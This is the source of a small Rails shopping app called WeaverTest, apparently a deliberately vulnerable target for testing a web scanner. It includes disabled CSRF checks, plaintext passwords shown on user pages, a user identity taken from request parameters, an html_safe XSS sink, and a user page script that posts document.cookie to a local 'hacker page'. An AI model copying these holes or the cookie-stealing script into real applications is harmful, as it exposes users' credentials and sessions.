config/routes.rb
WeaverTest::Application.routes.draw do

  match '/signin', to: 'sessions#new', via: 'get'
  match '/signout', to: 'sessions#destroy', via: 'delete'
  resources :sessions, :only => [:create]

  resources :buy_records, :only => [:create, :index]
  

  resources :goods

  resources :users

  root :to => 'static_pages#home'
  match '/help',    to: 'static_pages#help',    via: 'get'
  match '/link1',    to: 'static_pages#link1',    via: 'get'
  match '/link2',    to: 'static_pages#link2',    via: 'get'
  match '/link3',    to: 'static_pages#link3',    via: 'get'
  match '/link4',    to: 'static_pages#link4',    via: 'get'

end

app/models/buy_record.rb
class BuyRecord < ActiveRecord::Base
  attr_accessible :good_id, :user_id, :to_user

  belongs_to :user
  belongs_to :good
end

app/models/good.rb
class Good < ActiveRecord::Base
  attr_accessible :description, :name, :price

  has_many :buy_records
  has_many :user, through: :buy_records
end

app/models/user.rb
class User < ActiveRecord::Base
  attr_accessible :email, :password_digest, :username, :budget

  has_many :buy_records
  has_many :goods, through: :buy_records

  def buy good_id, to_user
    good = Good.find_by_id(good_id)
    if !good.nil? && good.price < self.budget
      buy_records.create(good_id: good_id, to_user: to_user)
      self.update_attributes(budget: self.budget - good.price)
      return true
    end
    return false
  end
end

app/controllers/application_controller.rb
class ApplicationController < ActionController::Base
  protect_from_forgery
  skip_before_filter :verify_authenticity_token

  include ApplicationHelper
  include SessionsHelper
end

app/controllers/buy_records_controller.rb
class BuyRecordsController < ApplicationController
  def create
    # binding.pry
    user = current_user
    success_transaction = user.buy(params[:buy_record][:good_id], params[:buy_record][:to_user])
    if success_transaction
      redirect_to good_path(params[:buy_record][:good_id]), flash: { success: "Done" }
    else 
      redirect_to good_path(params[:buy_record][:good_id]), flash: { error: "Not enough money" }
    end
  end

  def index
    @buy_records = BuyRecord.where(user_id: current_user.id)
  end
end

app/controllers/goods_controller.rb
class GoodsController < ApplicationController
  before_filter :signed_in_user, only: [:edit, :update]

  # GET /goods
  # GET /goods.json
  def index
    @goods = Good.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @goods }
    end
  end

  # GET /goods/1
  # GET /goods/1.json
  def show
    @good = Good.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @good }
    end
  end

  # GET /goods/new
  # GET /goods/new.json
  def new
    @good = Good.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @good }
    end
  end

  # GET /goods/1/edit
  def edit
    @good = Good.find(params[:id])
  end

  # POST /goods
  # POST /goods.json
  def create
    @good = Good.new(params[:good])
    # binding.pry
    respond_to do |format|
      if @good.save
        format.html { redirect_to @good, notice: 'Good was successfully created.' }
        format.json { render json: @good, status: :created, location: @good }
      else
        format.html { render action: "new" }
        format.json { render json: @good.errors, status: :unprocessable_entity }
      end
    end
  end

  # PUT /goods/1
  # PUT /goods/1.json
  def update
    @good = Good.find(params[:id])
    respond_to do |format|
      if @good.update_attributes(params[:good])
        format.html { redirect_to @good, notice: 'Good was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @good.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /goods/1
  # DELETE /goods/1.json
  def destroy
    @good = Good.find(params[:id])
    @good.destroy

    respond_to do |format|
      format.html { redirect_to goods_url }
      format.json { head :no_content }
    end
  end
end

app/controllers/sessions_controller.rb
class SessionsController < ApplicationController
  def new
    if signed_in?
      redirect_to goods_path
    end
  end

  def create
    user = User.find_by_email(params[:session][:email].downcase)
    # if user && user.authenticate(params[:session][:password])
    if user && user.password_digest == params[:session][:password]
      sign_in user
      redirect_back_or goods_path
    else
      flash.now[:error] = 'Invalid email/password combination'
      render 'new'
    end
  end

  def destroy
    sign_out
    redirect_to root_path
  end
end

app/controllers/static_pages_controller.rb
class StaticPagesController < ApplicationController
  def home
    
  end

  def link1
    
  end

  def link2
    
  end

  def link3
    
  end

  def link4
    
  end
end

app/controllers/users_controller.rb
class UsersController < ApplicationController
  before_filter :signed_in_user, :only => [:edit, :update]

  # GET /users
  # GET /users.json
  def index
    @users = User.all

    respond_to do |format|
      format.html # index.html.erb
      format.json { render json: @users }
    end
  end

  # GET /users/1
  # GET /users/1.json
  def show
    @user = User.find(params[:id])

    respond_to do |format|
      format.html # show.html.erb
      format.json { render json: @user }
    end
  end

  # GET /users/new
  # GET /users/new.json
  def new
    @user = User.new

    respond_to do |format|
      format.html # new.html.erb
      format.json { render json: @user }
    end
  end

  # GET /users/1/edit
  def edit
    @user = User.find(params[:id])
  end

  # POST /users
  # POST /users.json
  def create
    @user = User.new(params[:user])

    respond_to do |format|
      if @user.save
        format.html { redirect_to @user, notice: 'User was successfully created.' }
        format.json { render json: @user, status: :created, location: @user }
      else
        format.html { render action: "new" }
        format.json { render json: @user.errors, status: :unprocessable_entity }
      end
    end
  end

  # PUT /users/1
  # PUT /users/1.json
  def update
    @user = User.find(params[:id])
    respond_to do |format|
      if @user.update_attributes(params[:user])
        format.html { redirect_to @user, notice: 'User was successfully updated.' }
        format.json { head :no_content }
      else
        format.html { render action: "edit" }
        format.json { render json: @user.errors, status: :unprocessable_entity }
      end
    end
  end

  # DELETE /users/1
  # DELETE /users/1.json
  def destroy
    @user = User.find(params[:id])
    @user.destroy

    respond_to do |format|
      format.html { redirect_to users_url }
      format.json { head :no_content }
    end
  end
end

app/helpers/application_helper.rb
module ApplicationHelper
  def current_user
    User.find(params[:user_id])
  end
end

app/helpers/buy_records_helper.rb
module BuyRecordsHelper
end

app/helpers/goods_helper.rb
module GoodsHelper
end

app/helpers/sessions_helper.rb
module SessionsHelper
  def sign_in(user)
    cookies[:remember_token] = {
      value: user.email,
      expires: 1.day.from_now
    }
    self.current_user = user
  end

  def signed_in?
    !current_user.nil?
  end

  def current_user=(user)
    @current_user = user
  end

  def current_user
    @current_user ||= User.find_by_email(cookies[:remember_token])

  end

  def signed_in_user
    store_location
    redirect_to signin_path, notice: "Please sign in." unless signed_in?
  end

  def current_user?(user)
    user == current_user
  end

  def sign_out
    self.current_user = nil
    cookies.delete(:remember_token)
    session.delete(:return_to)
  end

  def redirect_back_or(default)
    redirect_to(session[:return_to] || default)
    session.delete(:return_to)
  end

  def store_location
    session[:return_to] = request.url
  end
end

app/helpers/static_pages_helper.rb
module StaticPagesHelper
end

app/helpers/users_helper.rb
module UsersHelper
end

app/views/buy_records/_form.html.erb
<%= form_for(@buy_record) do |f| %>
  <% if @buy_record.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@buy_record.errors.count, "error") %> prohibited this buy_record from being saved:</h2>

      <ul>
      <% @buy_record.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :user_id %><br />
    <%= f.number_field :user_id %>
  </div>
  <div class="field">
    <%= f.label :good_id %><br />
    <%= f.number_field :good_id %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/buy_records/create.html.erb
<h1>BuyRecords#create</h1>
<p>Find me in app/views/buy_records/create.html.erb</p>

app/views/buy_records/index.html.erb
<h1>Buying history</h1>

<table>
  <tr>
    <th>Good</th>
    <th>Price</th>
    <th>Description</th>
    <th>To user</th>
  </tr>

<% @buy_records.each do |b| %>
  <tr>
    <td><%= b.good.id %></td>
    <td><%= b.good.price %></td>
    <td><%= b.good.description %></td>
    <td><%= b.user.email %></td>
  </tr>
<% end %>
</table>

app/views/goods/_form.html.erb
<%= form_for(@good) do |f| %>
  <% if @good.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@good.errors.count, "error") %> prohibited this good from being saved:</h2>

      <ul>
      <% @good.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :name %><br />
    <%= f.text_field :name %>
  </div>
  <div class="field">
    <%= f.label :price %><br />
    <%= f.number_field :price %>
  </div>
  <div class="field">
    <%= f.label :description %><br />
    <%= f.text_field :description %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/goods/edit.html.erb
<h1>Editing good</h1>

<%= render 'form' %>

<%= link_to 'Show', @good %> |
<%= link_to 'Back', goods_path %>

app/views/goods/index.html.erb
<h1>Listing goods</h1>

<%= link_to 'Link 1', link1_path %><br>
<%= link_to 'Link1 with full url', 'http://0.0.0.0:3000/link1' %><br>
<%= link_to 'External page', 'http://google.com.vn' %><br>
<%= link_to 'External page, duplicate', 'http://google.com.vn' %><br>
<%= link_to 'Other external page', 'http://exanoke.com.vn' %><br>
<%= link_to 'Not found page', 'http://0.0.0.0:3000/not-found' %><br>

<a></a>
<a href></a>
<%= link_to 'To <blank> 1', '' %></br>
<%= link_to 'To <blank> 2', '' %></br>
<%= link_to 'A pdf file', '/Getting_Started.pdf' %><br>
<%= link_to 'A pdf file, duplicate', '/Getting_Started.pdf' %><br>

<%= link_to 'Goods page', goods_path %><br>
<%= link_to 'Users page', users_path %><br>

<table>
  <tr>
    <th>Name</th>
    <th>Price</th>
    <th>Description</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

<% @goods.each do |good| %>
  <tr>
    <td><%= good.name %></td>
    <td><%= good.price %></td>
    <td><%= good.description %></td>
    <td><%= link_to 'Show', good %></td>
    <td><%= link_to 'Edit', edit_good_path(good) %></td>
    <td><%= link_to 'Destroy', good, method: :delete, data: { confirm: 'Are you sure?' } %></td>
  </tr>
<% end %>
</table>

<br />

<%= link_to 'New Good', new_good_path %>

app/views/goods/new.html.erb
<h1>New good</h1>

<%= render 'form' %>

<%= link_to 'Back', goods_path %>

app/views/goods/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Name:</b>
  <%= @good.name.html_safe %>
</p>

<p>
  <b>Price:</b>
  <%= @good.price %>
</p>

<p>
  <b>Description:</b>
  <%= @good.description %>
</p>

<%= form_for :buy_record, url: buy_records_path do |f| %>
  <%= f.hidden_field :good_id, value: @good.id %>
  <%= f.hidden_field :to_user, value: current_user.id %>
  <%= f.submit "Buy this" %>
<% end %>
<%= link_to 'Edit', edit_good_path(@good) %> |
<%= link_to 'Back', goods_path %>

app/views/layouts/_header.html.erb
<% if signed_in? %>
  Current budget: <%= current_user.budget %>
  | <%= link_to 'Buying history', buy_records_path %>
  | <%= link_to "Sign out, #{current_user.email}", signout_path, method: :delete %><br>
<% else %>
  <%= link_to 'Sign in', signin_path %><br>
<% end %>
<%= link_to 'Goods', goods_path %> | <%= link_to 'Users', users_path %><br> 

app/views/layouts/application.html.erb
<!DOCTYPE html>
<html>
<head>
  <title>WeaverTest</title>
  <%= stylesheet_link_tag    "application", :media => "all" %>
  <%= javascript_include_tag "application" %>
  <%= csrf_meta_tags %>
</head>
<body>

<%= render partial: "layouts/header" %>
<% flash.each do |key, value| %>
  <div class="alert alert-<%= key %>"><%= value %></div>
<% end %>

<%= yield %>

</body>
</html>

app/views/static_pages/home.html.erb
<%= link_to 'Link 1', link1_path %><br>
<%= link_to 'Link1 with full url', 'http://0.0.0.0:3000/link1' %><br>
<%= link_to 'External page', 'http://google.com.vn' %><br>
<%= link_to 'Not found page', 'http://0.0.0.0:3000/not-found' %><br>

<a></a>
<%= link_to 'To <blank>', '' %></br>
<%= link_to 'A pdf file', '/Getting_Started.pdf' %><br>

<%= link_to 'Goods page', goods_path %><br>
<%= link_to 'Users page', users_path %><br>

app/views/static_pages/link1.html.erb
<%= link_to 'link 2', link2_path %><br>
<%= link_to 'link 3', link3_path %><br>
<%= link_to 'link to not found page', 'http://0.0.0.0:3000/not-found' %><br>
<%= link_to 'link to not found page', 'http://0.0.0.0:3000/not-found-again' %><br>

<form action="search.php?test=query" method="post"> 
  <label>search art</label> 
  <input name="searchFor" type="text" size="10"> 
  <input name="goButton" type="submit" value="go"> 
</form>

app/views/static_pages/link2.html.erb
<%= link_to 'link 1', link1_path %>
<%= link_to 'link 3', link3_path %>

app/views/static_pages/link3.html.erb
<%= link_to 'link 4', link4_path %>
<%= link_to 'link 3', link3_path %>
<%= link_to 'link 2', link2_path %>
<%= link_to 'link 1', link1_path %>
<%= link_to 'home', '/' %>

app/views/static_pages/link4.html.erb
<%= link_to 'link 2', link2_path %>
<%= link_to 'link 1', link1_path %>

app/views/users/_form.html.erb
<%= form_for(@user) do |f| %>
  <% if @user.errors.any? %>
    <div id="error_explanation">
      <h2><%= pluralize(@user.errors.count, "error") %> prohibited this user from being saved:</h2>

      <ul>
      <% @user.errors.full_messages.each do |msg| %>
        <li><%= msg %></li>
      <% end %>
      </ul>
    </div>
  <% end %>

  <div class="field">
    <%= f.label :email %><br />
    <%= f.text_field :email %>
  </div>
  <div class="field">
    <%= f.label :password_digest %><br />
    <%= f.text_field :password_digest %>
  </div>
  <div class="field">
    <%= f.label :username %><br />
    <%= f.text_field :username %>
  </div>
  <div class="actions">
    <%= f.submit %>
  </div>
<% end %>

app/views/users/edit.html.erb
<h1>Editing user</h1>

<%= render 'form' %>

<%= link_to 'Show', @user %> |
<%= link_to 'Back', users_path %>

app/views/users/index.html.erb
<h1>Listing users</h1>

<table>
  <tr>
    <th>Email</th>
    <th>Password digest</th>
    <th>Username</th>
    <th></th>
    <th></th>
    <th></th>
  </tr>

<% @users.each do |user| %>
  <tr>
    <td><%= user.email %></td>
    <td><%= user.password_digest %></td>
    <td><%= user.username %></td>
    <td><%= link_to 'Show', user %></td>
    <td><%= link_to 'Edit', edit_user_path(user) %></td>
    <td><%= link_to 'Destroy', user, method: :delete, data: { confirm: 'Are you sure?' } %></td>
  </tr>
<% end %>
</table>

<br />

<%= link_to 'New User', new_user_path %>

app/views/users/new.html.erb
<h1>New user</h1>

<%= render 'form' %>

<%= link_to 'Back', users_path %>

app/views/users/show.html.erb
<p id="notice"><%= notice %></p>

<p>
  <b>Email:</b>
  <%= @user.email %>
</p>

<p>
  <b>Password digest:</b>
  <%= @user.password_digest %>
</p>

<p>
  <b>Username:</b>
  <%= @user.username %>
</p>

<form action="/no_csrf_protection_form" method="post">
  <div class="info">This form has no csrf token</div>
  First name: <input type="text" name="fname"><br>
  Last name: <input type="text" name="lname"><br>
  <input type="submit" value="Submit">
</form>

<form action="/csrf_protection_with_captcha" method="post">
  <div class="info">This form has captcha</div>
  <%= render partial: "captcha" %>
</form>

<div>
  <div class="info">Move pointer enter below image to send cookie to hacker page</div>
  <img id="cookie" src="" height="30" width="30">
</div>

<%= link_to 'Edit', edit_user_path(@user) %> |
<%= link_to 'Back', users_path %>

<script type="text/javascript">
  $('#cookie').mouseenter(function() {
    $.ajax({
      type: "POST",
      url: "http://0.0.0.0:3001/cookies",
      data: { cookie : document.cookie }
    })
  })
</script>